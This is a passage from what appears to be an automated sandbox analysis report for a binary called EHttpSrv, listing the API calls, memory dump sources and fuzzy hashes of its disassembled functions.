                                                                                                                • GetAsyncKeyState.USER32(00000010), ref: 20433645
                                                                                                                • GetFocus.USER32 ref: 20433686
                                                                                                                • #2366.MFC80U(00000000), ref: 2043368D
                                                                                                                • GetParent.USER32(?), ref: 204336BE
                                                                                                                • #2366.MFC80U(00000000), ref: 204336C5
                                                                                                                • #2648.MFC80U(00000000), ref: 204336D5
                                                                                                                • SendMessageW.USER32(?,00000111,?,?), ref: 204336ED
                                                                                                                • InvalidateRect.USER32(?,?,00000001,?,?,?), ref: 2043372C
                                                                                                                • InvalidateRect.USER32(?,?,00000001,?,?,?), ref: 20433739
                                                                                                                • InvalidateRect.USER32(?,?,00000001,?,?,?), ref: 20433746
                                                                                                                • InvalidateRect.USER32(?,?,00000001,?,?,?,?,?,?), ref: 2043377A
                                                                                                                • InvalidateRect.USER32(?,?,00000001,?,?,?,?,?,?), ref: 20433787
                                                                                                                • InvalidateRect.USER32(?,?,00000001,?,?,?,?,?,?), ref: 20433794
                                                                                                                • #5210.MFC80U(?), ref: 204337BC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InvalidateRect$#2366$AsyncFocusState$#2648#5210MessageParentSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 2236022434-0
                                                                                                                • Opcode ID: e5f8472163658a24f54d053860e28f8de9d25d1832441840bc4068e4f68ef6cb
                                                                                                                • Instruction ID: d6c53d04e4ebd45af699540442615d6d0114f1a843398b458d8cfd05320b64f5
                                                                                                                • Opcode Fuzzy Hash: e5f8472163658a24f54d053860e28f8de9d25d1832441840bc4068e4f68ef6cb
                                                                                                                • Instruction Fuzzy Hash: EB4151B2204700ABD210DBB4CCC1FA7B3A8BB88709F50DA5DF689C7241DA75E945C761
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _wcsicmpfreemalloc$#1176#764
                                                                                                                • String ID: APP_FLAGS$BROWSER$BROWSERS$EXCLUDE$PATH$PE_MODULE$PE_MODULES
                                                                                                                • API String ID: 794166511-2182823657
                                                                                                                • Opcode ID: d3f1f10bb759c6654089e1c046311acb2bc1d16ab627f953fef81cf91d9bdb57
                                                                                                                • Instruction ID: 2a6e87a75f8b3fc6c74a09f9cae7ecbd177b1ae4e2273b2d026749da02545a81
                                                                                                                • Opcode Fuzzy Hash: d3f1f10bb759c6654089e1c046311acb2bc1d16ab627f953fef81cf91d9bdb57
                                                                                                                • Instruction Fuzzy Hash: 4AE172B15083419FC714CF99C880A5BB7E6BF98718F408A3DF999A7341D739EA05CB92
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #578$#1176#310$#1472#764
                                                                                                                • String ID:
                                                                                                                • API String ID: 2349227323-0
                                                                                                                • Opcode ID: 2610227527bf31bb19fbea4ff1886cc389bc402f13e30b8bf6ed253e8d00ae44
                                                                                                                • Instruction ID: a3ba692aaab1c2b727c89d8f7a094161e0542b32f1d56c50a55c7a7b244e2afa
                                                                                                                • Opcode Fuzzy Hash: 2610227527bf31bb19fbea4ff1886cc389bc402f13e30b8bf6ed253e8d00ae44
                                                                                                                • Instruction Fuzzy Hash: 7002CD715047058FE710CBA8C89479AFBF0AB59398F04C62DEEA482391D77D99C9CBC2
                                                                                                                APIs
                                                                                                                  • Part of subcall function 2041E000: #764.MFC80U(?,?,2046787F), ref: 2041E00B
                                                                                                                  • Part of subcall function 2041E000: #764.MFC80U(?,?,2046787F), ref: 2041E024
                                                                                                                  • Part of subcall function 2041E000: #764.MFC80U(?,?,2046787F), ref: 2041E03D
                                                                                                                  • Part of subcall function 2041E000: #764.MFC80U(?,?,2046787F), ref: 2041E056
                                                                                                                  • Part of subcall function 2041E000: #764.MFC80U(?,?,2046787F), ref: 2041E06F
                                                                                                                • EnterCriticalSection.KERNEL32(?), ref: 20467887
                                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 2046789B
                                                                                                                  • Part of subcall function 2041C400: #764.MFC80U(?,FEEA6C22,00000000,?,?,00000000,2047EF37,000000FF,204141E8), ref: 2041C441
                                                                                                                  • Part of subcall function 2041C400: #764.MFC80U(?,FEEA6C22,00000000,?,?,00000000,2047EF37,000000FF,204141E8), ref: 2041C45A
                                                                                                                  • Part of subcall function 2041C400: #764.MFC80U(?,FEEA6C22,00000000,?,?,00000000,2047EF37,000000FF,204141E8), ref: 2041C473
                                                                                                                  • Part of subcall function 2041C400: #764.MFC80U(?,FEEA6C22,00000000,?,?,00000000,2047EF37,000000FF,204141E8), ref: 2041C48C
                                                                                                                  • Part of subcall function 2041C400: #764.MFC80U(?,FEEA6C22,00000000,?,?,00000000,2047EF37,000000FF,204141E8), ref: 2041C4A5
                                                                                                                  • Part of subcall function 2041C400: #764.MFC80U(?,FEEA6C22,00000000,?,?,00000000,2047EF37,000000FF,204141E8), ref: 2041C4BE
                                                                                                                  • Part of subcall function 2041C400: #764.MFC80U(?,FEEA6C22,00000000,?,?,00000000,2047EF37,000000FF,204141E8), ref: 2041C4CE
                                                                                                                  • Part of subcall function 2041C400: #764.MFC80U(?,FEEA6C22,00000000,?,?,00000000,2047EF37,000000FF,204141E8), ref: 2041C4DE
                                                                                                                  • Part of subcall function 2041C400: #764.MFC80U(?,FEEA6C22,00000000,?,?,00000000,2047EF37,000000FF,204141E8), ref: 2041C4FA
                                                                                                                  • Part of subcall function 2041C400: #764.MFC80U(?,FEEA6C22,00000000,?,?,00000000,2047EF37,000000FF,204141E8), ref: 2041C516
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #764$CriticalSection$EnterLeave
                                                                                                                • String ID:
                                                                                                                • API String ID: 2103548376-0
                                                                                                                • Opcode ID: 085e8e5a0ce7d527f7d903e2f80839138fa4aeeafd138ec853872318bbc58ad1
                                                                                                                • Instruction ID: 400d4e8f41712a9da6c49c509346afd119955d52c450d2ecaee229d74a835260
                                                                                                                • Opcode Fuzzy Hash: 085e8e5a0ce7d527f7d903e2f80839138fa4aeeafd138ec853872318bbc58ad1
                                                                                                                • Instruction Fuzzy Hash: B042F2711083808FC335CFA8C884FDBB7E5AF95718F148A5EE59857391EB389A45CB92
                                                                                                                APIs
                                                                                                                • EnterCriticalSection.KERNEL32(?,?,?), ref: 20464BC8
                                                                                                                  • Part of subcall function 20464AB0: #2461.MFC80U(00010001,?,?,?,?,20464BD4,?), ref: 20464AF8
                                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 20464C3F
                                                                                                                • #764.MFC80U(?,?,?,?,00000000,00000000), ref: 20464CA7
                                                                                                                • #764.MFC80U(?,?), ref: 20464D50
                                                                                                                • #764.MFC80U(?,?,FEEA6C22,?,?,?), ref: 20464E2D
                                                                                                                • #764.MFC80U(?,?,?), ref: 20464F19
                                                                                                                  • Part of subcall function 2041C9A0: #764.MFC80U(?,?,?,?,00000000,2041EEEA,?,?,?,?,?,?), ref: 2041C9D0
                                                                                                                  • Part of subcall function 2041C9A0: #764.MFC80U(?,?,?,?,00000000,2041EEEA,?,?,?,?,?,?), ref: 2041C9E0
                                                                                                                  • Part of subcall function 2041C9A0: #764.MFC80U(?,?,?,?,00000000,2041EEEA,?,?,?,?,?,?), ref: 2041C9F0
                                                                                                                  • Part of subcall function 2041C9A0: #764.MFC80U(00000000,?,?,?,00000000,2041EEEA,?,?,?,?,?,?), ref: 2041CA09
                                                                                                                  • Part of subcall function 2041C9A0: #764.MFC80U(?,?,?,?,00000000,2041EEEA,?,?,?,?,?,?), ref: 2041CA22
                                                                                                                  • Part of subcall function 2041C9A0: #764.MFC80U(?,?,?,?,00000000,2041EEEA,?,?,?,?,?,?), ref: 2041CA3B
                                                                                                                  • Part of subcall function 2041C9A0: #764.MFC80U(?,?,?,?,00000000,2041EEEA,?,?,?,?,?,?), ref: 2041CA57
                                                                                                                  • Part of subcall function 2041C9A0: #764.MFC80U(?,?,?,?,00000000,2041EEEA,?,?,?,?,?,?), ref: 2041CA70
                                                                                                                  • Part of subcall function 2041C9A0: qsort.MSVCR80 ref: 2041CAA0
                                                                                                                  • Part of subcall function 2041C400: #764.MFC80U(?,FEEA6C22,00000000,?,?,00000000,2047EF37,000000FF,204141E8), ref: 2041C441
                                                                                                                  • Part of subcall function 2041C400: #764.MFC80U(?,FEEA6C22,00000000,?,?,00000000,2047EF37,000000FF,204141E8), ref: 2041C45A
                                                                                                                  • Part of subcall function 2041C400: #764.MFC80U(?,FEEA6C22,00000000,?,?,00000000,2047EF37,000000FF,204141E8), ref: 2041C473
                                                                                                                  • Part of subcall function 2041C400: #764.MFC80U(?,FEEA6C22,00000000,?,?,00000000,2047EF37,000000FF,204141E8), ref: 2041C48C
                                                                                                                  • Part of subcall function 2041C400: #764.MFC80U(?,FEEA6C22,00000000,?,?,00000000,2047EF37,000000FF,204141E8), ref: 2041C4A5
                                                                                                                  • Part of subcall function 2041C400: #764.MFC80U(?,FEEA6C22,00000000,?,?,00000000,2047EF37,000000FF,204141E8), ref: 2041C4BE
                                                                                                                  • Part of subcall function 2041C400: #764.MFC80U(?,FEEA6C22,00000000,?,?,00000000,2047EF37,000000FF,204141E8), ref: 2041C4CE
                                                                                                                  • Part of subcall function 2041C400: #764.MFC80U(?,FEEA6C22,00000000,?,?,00000000,2047EF37,000000FF,204141E8), ref: 2041C4DE
                                                                                                                  • Part of subcall function 2041C400: #764.MFC80U(?,FEEA6C22,00000000,?,?,00000000,2047EF37,000000FF,204141E8), ref: 2041C4FA
                                                                                                                  • Part of subcall function 2041C400: #764.MFC80U(?,FEEA6C22,00000000,?,?,00000000,2047EF37,000000FF,204141E8), ref: 2041C516
                                                                                                                  • Part of subcall function 204677F0: EnterCriticalSection.KERNEL32(?), ref: 20467887
                                                                                                                  • Part of subcall function 204677F0: LeaveCriticalSection.KERNEL32(?), ref: 2046789B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #764$CriticalSection$EnterLeave$#2461qsort
                                                                                                                • String ID:
                                                                                                                • API String ID: 3166723043-0
                                                                                                                • Opcode ID: 6fc30c7af073cabd18ac7b3964380b98f00c32fa149624f82ab689f31ac1673f
                                                                                                                • Instruction ID: e8b5675c7224ba4e7748d1bd8268b0e2504bea7d3dd32206b2339b0d9384b6ac
                                                                                                                • Opcode Fuzzy Hash: 6fc30c7af073cabd18ac7b3964380b98f00c32fa149624f82ab689f31ac1673f
                                                                                                                • Instruction Fuzzy Hash: A3C16A715083818BC735CF94C884B9BF7E8BFD8704F448D2EE99997255E734A904CB92
                                                                                                                APIs
                                                                                                                • _crt_debugger_hook.MSVCR80(00000001), ref: 20478FD5
                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 20478FDD
                                                                                                                • UnhandledExceptionFilter.KERNEL32(20483C84), ref: 20478FE8
                                                                                                                • _crt_debugger_hook.MSVCR80(00000001), ref: 20478FF9
                                                                                                                • GetCurrentProcess.KERNEL32(C0000409), ref: 20479004
                                                                                                                • TerminateProcess.KERNEL32(00000000), ref: 2047900B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ExceptionFilterProcessUnhandled_crt_debugger_hook$CurrentTerminate
                                                                                                                • String ID:
                                                                                                                • API String ID: 1952319052-0
                                                                                                                • Opcode ID: 860ed5c6a1f2dbeceea49a0963ff88d4ebbc692b8e68553eadb04c93b2242d31
                                                                                                                • Instruction ID: 8bac57b613e01f3e289521a234b69ccc3e518c181047f61f5409c8e065ca41fd
                                                                                                                • Opcode Fuzzy Hash: 860ed5c6a1f2dbeceea49a0963ff88d4ebbc692b8e68553eadb04c93b2242d31
                                                                                                                • Instruction Fuzzy Hash: FB21C476809A01AFD300DF54DEA47987FB2BB08309F50C5AAE908963B1EF7D5580AF45
                                                                                                                APIs
                                                                                                                • FindResourceW.KERNEL32(00000000,00000251,GIF,?,?,00000000,?,2047270C,00000000), ref: 2043AC0B
                                                                                                                • LoadResource.KERNEL32(00000000,00000000,?,2047270C,00000000), ref: 2043AC20
                                                                                                                • LockResource.KERNEL32(00000000,?,2047270C,00000000), ref: 2043AC2B
                                                                                                                • SizeofResource.KERNEL32(00000000,00000000,?,2047270C,00000000), ref: 2043AC39
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Resource$FindLoadLockSizeof
                                                                                                                • String ID: GIF
                                                                                                                • API String ID: 3473537107-881873598
                                                                                                                • Opcode ID: fda190d25d19b3bb4f23aa5c4472a95b8498435cac0136f821365612f0d413f3
                                                                                                                • Instruction ID: 25fb0802ef857b1b8cfa482b96e02b8801164d38fb912450ba75ea80aa748c93
                                                                                                                • Opcode Fuzzy Hash: fda190d25d19b3bb4f23aa5c4472a95b8498435cac0136f821365612f0d413f3
                                                                                                                • Instruction Fuzzy Hash: AFF0E27220A2182F56002BA5ACCC97B7B9CEB4A06B720A57EFA02D2200DF19CC04A1B1
                                                                                                                APIs
                                                                                                                • #1176.MFC80U(?,?,00000000,?,?,00000000,?,?,00000000,?,?,?,00000004), ref: 20421292
                                                                                                                • SendMessageW.USER32(?,00001023,00000000,00000000), ref: 204212A4
                                                                                                                • SendMessageW.USER32(?,00001025,00000000,00000000), ref: 20421333
                                                                                                                • #1176.MFC80U(?,00000000,?,?,00000000,?,?,00000000,?,?,?,00000004), ref: 204213D8
                                                                                                                  • Part of subcall function 20421820: #762.MFC80U(00000008,FEEA6C22,00000000,?), ref: 2042189B
                                                                                                                  • Part of subcall function 20421820: CreateFontIndirectW.GDI32(?), ref: 204218C6
                                                                                                                  • Part of subcall function 20421820: #1271.MFC80U(00000000), ref: 204218CF
                                                                                                                • #1176.MFC80U(?,00000000,?,?,00000000,?,?,00000000,?,?,?,00000004), ref: 204215B3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #1176$MessageSend$#1271#762CreateFontIndirect
                                                                                                                • String ID:
                                                                                                                • API String ID: 3567125150-0
                                                                                                                • Opcode ID: c596b150b123cf0fb824b19fe029bece8b1c90fbd336ebc5bc2a6d5d738775bf
                                                                                                                • Instruction ID: ab8655cf033fe74e562ce33e514001b9a1a4960ed1ab2b43dd18b84213ffceff
                                                                                                                • Opcode Fuzzy Hash: c596b150b123cf0fb824b19fe029bece8b1c90fbd336ebc5bc2a6d5d738775bf
                                                                                                                • Instruction Fuzzy Hash: 87D13435309B858FD714CE94E180B96B7E1AFA4708F14C58CEE895B762C339ED4ACB91
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Version
                                                                                                                • String ID:
                                                                                                                • API String ID: 1889659487-0
                                                                                                                • Opcode ID: e5cb0f8d09211db32fa36cb3dd6a5409fb1ca09698d5fb2ad83bfec6907384d3
                                                                                                                • Instruction ID: f47e5d62cc04de8b2256f5f769aa09903e1a3ab051587a23db139a3c626e4246
                                                                                                                • Opcode Fuzzy Hash: e5cb0f8d09211db32fa36cb3dd6a5409fb1ca09698d5fb2ad83bfec6907384d3
                                                                                                                • Instruction Fuzzy Hash: CCF090706046058FD768DF74C8433EA37E56B98704F81C93CA669C21D1EB3C95049783
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 772e8142fe3a3ce92b283449413c2f34e5d542bc5b1622f8da163ca8858429ba
                                                                                                                • Instruction ID: 13f0373110e8bc8474aed2d1245a2fc90ebe293577a033205e891d16d3017eec
                                                                                                                • Opcode Fuzzy Hash: 772e8142fe3a3ce92b283449413c2f34e5d542bc5b1622f8da163ca8858429ba
                                                                                                                • Instruction Fuzzy Hash: 9EF12C746087018FC718CF58C590A2ABBE6BF8C719F04896DE98AE7352D738EC05CB46
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _snwprintf_s
                                                                                                                • String ID:
                                                                                                                • API String ID: 2338360151-0
                                                                                                                • Opcode ID: 5edb0150b19be3b253c3e5bc146e12c1adbb77941c162d5ba67b7834c83c78da
                                                                                                                • Instruction ID: 2bf30c187b0b980205b1f57df9a8e394672104b84b515bf37f1867684d20818b
                                                                                                                • Opcode Fuzzy Hash: 5edb0150b19be3b253c3e5bc146e12c1adbb77941c162d5ba67b7834c83c78da
                                                                                                                • Instruction Fuzzy Hash: 474196B15042014BC308DFA9C8516BBB7E5EFB8604F80C93EF58AE6651EA39DA44C796
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 868a662ae6dd30aa4f31b376f3b35005072d25e9c95b802d47fb07b9ae0c49d1
                                                                                                                • Instruction ID: 6a1103ddd9c18026c880f096e47f46a186ed588ba1783c199cf0829f1bbf6f7b
                                                                                                                • Opcode Fuzzy Hash: 868a662ae6dd30aa4f31b376f3b35005072d25e9c95b802d47fb07b9ae0c49d1
                                                                                                                • Instruction Fuzzy Hash: 4D019E717029225BB38CCD2F98A41B7E2D3DBD8211380C53EA4DEC7799DE35945ADB90
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
